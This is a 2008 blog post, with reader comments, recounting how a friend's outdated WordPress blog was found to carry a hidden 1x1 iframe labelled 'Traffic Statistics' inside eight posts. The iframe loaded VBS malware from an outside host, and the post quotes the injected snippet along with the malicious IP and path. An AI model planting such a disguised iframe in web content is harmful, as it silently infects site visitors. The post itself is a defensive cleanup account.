|
2nd
May
2008
 I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back. Ultimately he ended up having a local computer repair person come out, who cleaned up his system and a couple of hours and the problem went away., but today,we talked by phone, and he told me he got the warning again when he viewed his own blog. I took a look at his blog and here’s what I saw -
Interesting! I recognize the IP address from the file that I couldn’t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from… it came from his own WordPress blog! At that point I did little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else’s old posts. <!– Traffic Statistics –> <iframe height=”1″ width=”1″ frameBorder=”0″ src=”http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp”></iframe><!– End Traffic Statistics –> At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, it was found in 8 different posts! It was coming from http://61.155.8.157/iframe/wp-stats.php and was a VBS Malware-gen Luckily he’s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday? The moral of the story? Moderate your new users, use a secure password, keep your Wordpress current (his was not) and watch out for strange e-mail addresses signing up as new users! |
|
|||||||||
|
|
| |||||||
Copyright 2007; Search Commander; SEO Consultant Scott Hendison; All Rights Reserved.
May 3rd, 2008 at 5:17 pm
What a scary bug!! For future reference though, wouldn’t it be more efficient if you have lots of posts to do a database query inside the database for that text so you can find the infected posts?
May 4th, 2008 at 7:44 am
Yep, you’re absolutely right, and I didn’t even think of that obvious solution… Thank you.
It makes perfect sense, rather than looking through post after post. - I hope I never get a chance to try it though!
May 4th, 2008 at 10:09 am
I also use the No Script plugin for Firefox. While I scan my own stuff, I don’t always trust others.
May 13th, 2008 at 2:37 am
Is there a way to automatically scan all pages of a site for a virus ?
May 13th, 2008 at 8:45 am
as in, someone elses site? If you have no local access to the files, you mean? Hmmm, I’m not sure. McAfee Site Advisor maybe? Anyone else know?
June 23rd, 2008 at 7:20 am
To be very true, I am shocked to know that because I have just installed wordpress on my 2 new sites. Thanks for the nice tips though to save ourselves from such malicious code.